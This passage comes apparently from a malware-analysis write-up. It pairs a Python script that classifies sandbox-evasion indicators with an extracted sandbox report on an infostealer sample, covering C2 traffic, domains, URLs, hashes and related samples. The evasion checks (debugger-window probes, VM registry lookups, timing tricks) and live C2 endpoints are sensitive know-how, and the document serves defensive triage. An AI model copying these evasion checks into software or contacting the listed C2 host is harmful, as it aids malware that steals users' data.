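SOFTICE_DEVICES = {"NTICE", "SICE", "SIWVID"}   # \\.\NTICE etc.: SoftICE driver devices
# Registry values whose content names the hypervisor (BIOS strings, display adapter).
VM_REGISTRY_VALUES = {"SystemBiosVersion", "VideoBiosVersion", "DriverDesc"}

ATTACK = {   # family name (my own naming) -> ATT&CK technique ID
    "rdtsc timing check": "T1497.003",
    "self-modifying code": "T1027",
    "VM artifact registry lookup": "T1497.001",
    "sldt VM check": "T1497.001",
    "analysis-tool window probe": "T1518.001",
    "SoftICE device probe": "T1622",
    "ProcessDebugPort query": "T1622",
    "ThreadHideFromDebugger": "T1622",
}


def classify(label, value):
    """Return (family, detail) for one parsed row, or None if it is not an evasion indicator."""
    value = value.replace("Jump to behavior", "").strip()   # strip report link residue
    if label == "RDTSC instruction interceptor":
        return "rdtsc timing check", value.split(" instructions:")[0]
    if label == "Special instruction interceptor" and "Self-modifying" in value:
        return "self-modifying code", value.split(" instructions")[0]
    if label == "Registry key queried":
        key, _, name = value.partition(" name: ")
        if name in VM_REGISTRY_VALUES:
            return "VM artifact registry lookup", key + "\\" + name
    if label == "Open window title or class name" and value.lower() in WINDOW_TOOLS:
        return "analysis-tool window probe", WINDOW_TOOLS[value.lower()]
    if label == "File opened" and value in SOFTICE_DEVICES:
        return "SoftICE device probe", value
    if label == "Process queried" and value == "DebugPort":
        return "ProcessDebugPort query", "NtQueryInformationProcess(ProcessDebugPort)"
    if label == "Thread information set" and value == "HideFromDebugger":
        return "ThreadHideFromDebugger", "NtSetInformationThread(ThreadHideFromDebugger)"
    if label == "Code function" and " sldt " in value:
        return "sldt VM check", value.split()[0]
    return None


def triage(lines):
    """Parse report rows; return per-family counts, ATT&CK IDs, details and probed tools."""
    counts, details, tools = Counter(), {}, set()
    for line in lines:
        m = _ROW.match(line.strip())
        hit = classify(m["label"], m["val"]) if m else None
        if hit is None:
            continue
        family, detail = hit
        counts[family] += 1
        details.setdefault(family, []).append(detail)
        if family == "analysis-tool window probe":
            tools.add(detail)
    return {"counts": counts, "attack": {f: ATTACK[f] for f in counts},
            "details": details, "tools": tools}


# Constructed input: a subset of rows copied from this report, as they appear after extraction.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6E90ACD second address: 6E90AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSpecial instruction interceptor: First address: A38528 instructions caused by: Self-modifying code",
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior",
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior",
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeCode function: 1_2_06F304CE sldt word ptr [eax]1_2_06F304CE",
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeThread information set: HideFromDebuggerJump to behavior",
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeOpen window title or class name: ollydbg",
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeOpen window title or class name: gbdyllo",
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeOpen window title or class name: procmon_window_class",
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com",
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeOpen window title or class name: regmonclass",
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeOpen window title or class name: filemonclass",
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeFile opened: NTICE",
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeFile opened: SICE",
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeFile opened: SIWVID",
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeProcess queried: DebugPortJump to behavior",
]

if __name__ == "__main__":
    summary = triage(SAMPLE_ROWS)
    for family, n in summary["counts"].most_common():
        print(f"{summary['attack'][family]:10} {n:3}  {family}: {sorted(set(summary['details'][family]))}")
```

Feed it the full row list of a report (one row per line) and the output is the count per family, which is what a sandbox-hardening engineer needs: every window class, device name and registry value that a protector probes is something the analysis VM must scrub or spoof, and the `details` lists give the exact names. Rows the parser does not recognise (the Amcache strings, volume queries) are skipped rather than mis-classified.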

Stealing of Sensitive Information

Source: global trafficTCP traffic: 192.168.2.5:49726 -> 185.121.15.192:80
Source: global trafficTCP traffic: 192.168.2.5:49733 -> 185.121.15.192:80
Source: global trafficTCP traffic: 192.168.2.5:49734 -> 185.121.15.192:80
MITRE ATT&CK Matrix (numbers in parentheses are the signature hit counts shown on the original matrix; cells without a count had no matching signature in this run)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: Process Injection (2); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: Virtualization/Sandbox Evasion (24); Process Injection (2); Obfuscated Files or Information (1); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (24); Process Discovery (12); Remote System Discovery (1); System Information Discovery (214)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

Source | Detection | Scanner | Label
5ZH9uXmzGP.exe | 53% | Virustotal |
5ZH9uXmzGP.exe | 50% | ReversingLabs | Win32.Infostealer.Tinba
5ZH9uXmzGP.exe | 100% | Avira | TR/Crypt.TPM.Gen
5ZH9uXmzGP.exe | 100% | Joe Sandbox ML |

No Antivirus matches (reported for each of the four further artifact tables on the original page)
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fivetk5ht.top | 185.121.15.192 | true | false | | high
httpbin.org | 98.85.100.80 | true | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851 | false | | high
https://httpbin.org/ip | false | | high

URLs from memory and binary strings

Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://html4/loose.dtd | 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fivetk5ht.top/zldPR | 5ZH9uXmzGP.exe, 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.0000000001485000.00000004.00000020.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000003.2319274899.0000000001485000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp | 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://httpbin.org/ipbefore | 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/http-cookies.html | 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851z | 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798516963 | 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17 | 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://upx.sf.net | Amcache.hve.5.dr | false | | high
https://curl.se/docs/alt-svc.html | 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.css | 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fivetk5ht.top/zldPRE_ | 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.0000000001485000.00000004.00000020.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000003.2319274899.0000000001485000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://.jpg | 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp | false | | high

Note: the home.fivetk5ht.top rows ending in zldPR, zldPRE_, ...Ov17, ...1734579851z and ...17345798516963 appear to be partial or overwritten copies of the single contacted URL recovered from process memory, not distinct endpoints. The curl.se documentation URLs (hsts, http-cookies, alt-svc) are the header comments libcurl writes into its HSTS, cookie and Alt-Svc cache files, so the sample carries a statically linked libcurl, which also explains the user-agent-less HTTP requests flagged in the signature list. https://httpbin.org/ip returns the caller's public IP address; fetching it before the check-in to home.fivetk5ht.top is a common pre-beacon step. The only host-sourced entry is http://upx.sf.net, which comes from the analysis VM's Amcache hive rather than from the sample.
IP | Domain | Country | ASN | ASN Name | Malicious
185.121.15.192 | home.fivetk5ht.top | Spain | 207046 | REDSERVICIOES | false
98.85.100.80 | httpbin.org | United States | 11351 | TWC-11351-NORTHEASTUS | false
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1578926
                                      Start date and time:2024-12-20 16:43:26 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 35s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:5ZH9uXmzGP.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:35e2c99a2fed28f4148ef7f4c1431df4.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@2/5@10/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 52.168.117.173, 40.126.53.6, 13.107.246.63, 4.245.163.56
                                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:44:45 | API Interceptor | 3x Sleep call for process: 5ZH9uXmzGP.exe modified
10:44:56 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.121.15.192 | 2M43DSi2cx.exe | malicious | Unknown | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
185.121.15.192 | HZhObFuFNe.exe | malicious | Unknown | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
185.121.15.192 | t6VDbnvGeN.exe | malicious | Unknown | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
185.121.15.192 | 16ebsersuX.exe | malicious | Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | hUhhrsyGtz.exe | malicious | Cryptbot | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
185.121.15.192 | pCElIX19tu.exe | malicious | Unknown | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
185.121.15.192 | CMpuGis28l.exe | malicious | Unknown | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
185.121.15.192 | 5Jat5RkD3a.exe | malicious | Unknown | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | u57m8aCdwb.exe | malicious | Unknown | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
185.121.15.192 | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
98.85.100.80 | u16wYpJpGE.exe | malicious | Clipboard Hijacker, Cryptbot |
98.85.100.80 | HZhObFuFNe.exe | malicious | Unknown |
98.85.100.80 | t6VDbnvGeN.exe | malicious | Unknown |
98.85.100.80 | CMpuGis28l.exe | malicious | Unknown |
98.85.100.80 | u57m8aCdwb.exe | malicious | Unknown |
98.85.100.80 | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot |
98.85.100.80 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT |
98.85.100.80 | file.exe | malicious | LummaC, Amadey, LummaC Stealer |
98.85.100.80 | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar |
98.85.100.80 | Tii6ue74NB.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
home.fivetk5ht.top | 2M43DSi2cx.exe | malicious | Unknown | 185.121.15.192
home.fivetk5ht.top | HZhObFuFNe.exe | malicious | Unknown | 185.121.15.192
home.fivetk5ht.top | t6VDbnvGeN.exe | malicious | Unknown | 185.121.15.192
home.fivetk5ht.top | hUhhrsyGtz.exe | malicious | Cryptbot | 185.121.15.192
home.fivetk5ht.top | pCElIX19tu.exe | malicious | Unknown | 185.121.15.192
home.fivetk5ht.top | CMpuGis28l.exe | malicious | Unknown | 185.121.15.192
home.fivetk5ht.top | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 185.121.15.192
home.fivetk5ht.top | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 185.121.15.192
httpbin.org | 2M43DSi2cx.exe | malicious | Unknown | 34.226.108.155
httpbin.org | f9bcOz8SxR.exe | malicious | Unknown | 34.226.108.155
httpbin.org | u16wYpJpGE.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
httpbin.org | 1o81tDUu5M.exe | malicious | Unknown | 34.226.108.155
httpbin.org | HZhObFuFNe.exe | malicious | Unknown | 98.85.100.80
httpbin.org | t6VDbnvGeN.exe | malicious | Unknown | 98.85.100.80
httpbin.org | 16ebsersuX.exe | malicious | Cryptbot | 34.226.108.155
httpbin.org | hUhhrsyGtz.exe | malicious | Cryptbot | 34.226.108.155
httpbin.org | pCElIX19tu.exe | malicious | Unknown | 34.226.108.155
httpbin.org | CMpuGis28l.exe | malicious | Unknown | 98.85.100.80
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TWC-11351-NORTHEASTUS | u16wYpJpGE.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
TWC-11351-NORTHEASTUS | HZhObFuFNe.exe | malicious | Unknown | 98.85.100.80
TWC-11351-NORTHEASTUS | t6VDbnvGeN.exe | malicious | Unknown | 98.85.100.80
TWC-11351-NORTHEASTUS | CMpuGis28l.exe | malicious | Unknown | 98.85.100.80
TWC-11351-NORTHEASTUS | u57m8aCdwb.exe | malicious | Unknown | 98.85.100.80
TWC-11351-NORTHEASTUS | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
TWC-11351-NORTHEASTUS | arm5.elf | malicious | Mirai | 72.226.210.219
TWC-11351-NORTHEASTUS | hmips.elf | malicious | Mirai | 45.46.119.24
TWC-11351-NORTHEASTUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 98.85.100.80
TWC-11351-NORTHEASTUS | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 98.85.100.80
REDSERVICIOES | 2M43DSi2cx.exe | malicious | Unknown | 185.121.15.192
REDSERVICIOES | HZhObFuFNe.exe | malicious | Unknown | 185.121.15.192
REDSERVICIOES | t6VDbnvGeN.exe | malicious | Unknown | 185.121.15.192
REDSERVICIOES | 16ebsersuX.exe | malicious | Cryptbot | 185.121.15.192
REDSERVICIOES | hUhhrsyGtz.exe | malicious | Cryptbot | 185.121.15.192
REDSERVICIOES | pCElIX19tu.exe | malicious | Unknown | 185.121.15.192
REDSERVICIOES | CMpuGis28l.exe | malicious | Unknown | 185.121.15.192
REDSERVICIOES | 5Jat5RkD3a.exe | malicious | Unknown | 185.121.15.192
REDSERVICIOES | u57m8aCdwb.exe | malicious | Unknown | 185.121.15.192
REDSERVICIOES | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | 185.121.15.192
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.9438708942187108
                                                          Encrypted:false
                                                          SSDEEP:96:BTsFhAtAxsGhIGhpJfZQXIDcQvc6QcEVcw3cE/3+HbHg/8BRTf3Oy1oVazW0dPtZ:C7dx60BU/Qju0ZrPMtwzuiFSZ24IO8L
                                                          MD5:3A7AE20591788911A34CF12EF163382C
                                                          SHA1:B4535E823CB6AB08788F5117E386EF54144FA8FE
                                                          SHA-256:A539B71FC8FE631ED04208506538265461AD5B713CF9CE03A77F0C3AB45B86BE
                                                          SHA-512:8F2DBC2687F3DDA8E851846B1E735EA0EE2D057E8CF473D6B1496F1DA58E641879D28528F73C5805A79E7399621496A6202393E3AE87F00C7A124C8B0633749A
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.3.0.9.1.0.0.2.7.6.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.3.0.9.1.6.1.2.1.5.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.3.3.2.0.5.f.-.0.1.9.c.-.4.e.5.b.-.a.e.c.c.-.c.5.5.c.5.a.5.c.0.d.3.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.f.4.e.b.5.4.2.-.b.a.8.7.-.4.f.0.a.-.b.6.6.d.-.f.2.e.b.f.8.4.e.a.d.4.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.5.Z.H.9.u.X.m.z.G.P...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.4.c.-.0.0.0.1.-.0.0.1.4.-.7.8.8.c.-.5.6.1.2.f.6.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.0.8.b.6.2.9.a.e.1.4.7.5.2.9.0.b.b.8.4.4.4.7.d.5.1.2.3.a.2.5.0.0.0.0.0.f.f.f.f.!.0.0.0.0.8.b.0.5.a.a.4.7.0.9.f.d.0.9.8.9.2.2.3.8.b.a.a.7.a.1.4.f.4.2.d.5.8.d.d.5.8.d.1.4.!.5.Z.H.9.u.X.m.z.G.P...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 15 streams, Fri Dec 20 15:44:51 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):214932
                                                          Entropy (8bit):1.4160347153621256
                                                          Encrypted:false
                                                          SSDEEP:384:GaSv3CEqLC7YSzDQKgoTIr/8ApekF3spudfOtGSaIuP4fgN7uUqGq8U:5SvyEqLnKDQKgoErhou8OmgqGN
                                                          MD5:5196FF78088411E0615E89641137CEB3
                                                          SHA1:5D4C84F99ED9A51216531E77EEBAEC8ECC9F9ADC
                                                          SHA-256:F74722EC0AE78EE5CFBB30177BB46461232DCD8A4BFC6A4029F347A3B52DB2B6
                                                          SHA-512:6380DB6F1A95F7993C1A9D79A69025A6B73A7D0F25DF73D1C3D02E8CCD51F95C178B5B93A8A3D340353D063D18F89AC1E35EF51836FC8F4464A2957CA3F4EBB6
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:MDMP..a..... ........eg............t...........D................ ...........}..........`.......8...........T............,..............P!..........<#..............................................................................eJ.......#......GenuineIntel............T.......L....eg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8356
                                                          Entropy (8bit):3.703365744207873
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJcF6cl36YEIRSU9m9gmfibSprL89b3ysfau9m:R6lXJm6O6YEOSU9m9gmfibz3xfaV
                                                          MD5:553FAAAC8C9B62A0E949FF4E29304D79
                                                          SHA1:AB8EF235D30A15E73A419ADC1898EEE744EADEC9
                                                          SHA-256:6F9B794A8618FA45EA531129F2DFF541F284160A788BDB9CE3BE5A321ED68E27
                                                          SHA-512:C9C6812733329633A5DE7EE4DA5BF0CB54C6BEEF4DB19071FFA7C7FED22E4A9830CF509D8B923AB4B52A95A0DFE6345D04212C82D14E3AC963727CA086EA4CFA
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.4.8.<./.P.i.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4594
                                                          Entropy (8bit):4.482212084040487
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zsmJg77aI9NyWpW8VYIYm8M4JT5Fu+q8W8zUUzCAd:uIjf8I7fT7V4JGiYUzCAd
                                                          MD5:7A2897B9096DBE134B5FD40944C9F284
                                                          SHA1:1CA788F5E0A9DACD867B1466C86067A1CE3E6334
                                                          SHA-256:E8089D5D24236CE1DC6A36A2E941822C05646B5C00A6C910DD5095CB97F727C3
                                                          SHA-512:92FD717209B4EAA21AB8753AAB3A2B0D91255F4FE1BEF7E0C366814541CFC505F15E1A68CEA66A516FBAEADA8FBDC92490DBA2B245B9B8F8871C44DD40E7EFF3
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639767" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.421574671527228
                                                          Encrypted:false
                                                          SSDEEP:6144:sSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNm0uhiTw:XvloTMW+EZMM6DFyE03w
                                                          MD5:18B4143C546EEBA977CE81CB70BDFCA1
                                                          SHA1:02E53281EAABE8E7C11F705F754B86AEB359CCAB
                                                          SHA-256:E208CBBF5D9EC1F6DCA67985091021E6F46F6244FE71F2B26449843254CAA70A
                                                          SHA-512:339137FCC54C453F3543910D2B93CB9BCB6BB55EF832CEAE95499C1028FB6A51FDA768CCA03D9674200884B799704435F1A4A5114635E8B497E843EF40FB4839
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.@%..R................................................................................................................................................................................................................................................................................................................................................2/........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Entropy (8bit):7.983059112357185
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • VXD Driver (31/22) 0.00%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:5ZH9uXmzGP.exe
                                                          File size:4'485'120 bytes
                                                          MD5:35e2c99a2fed28f4148ef7f4c1431df4
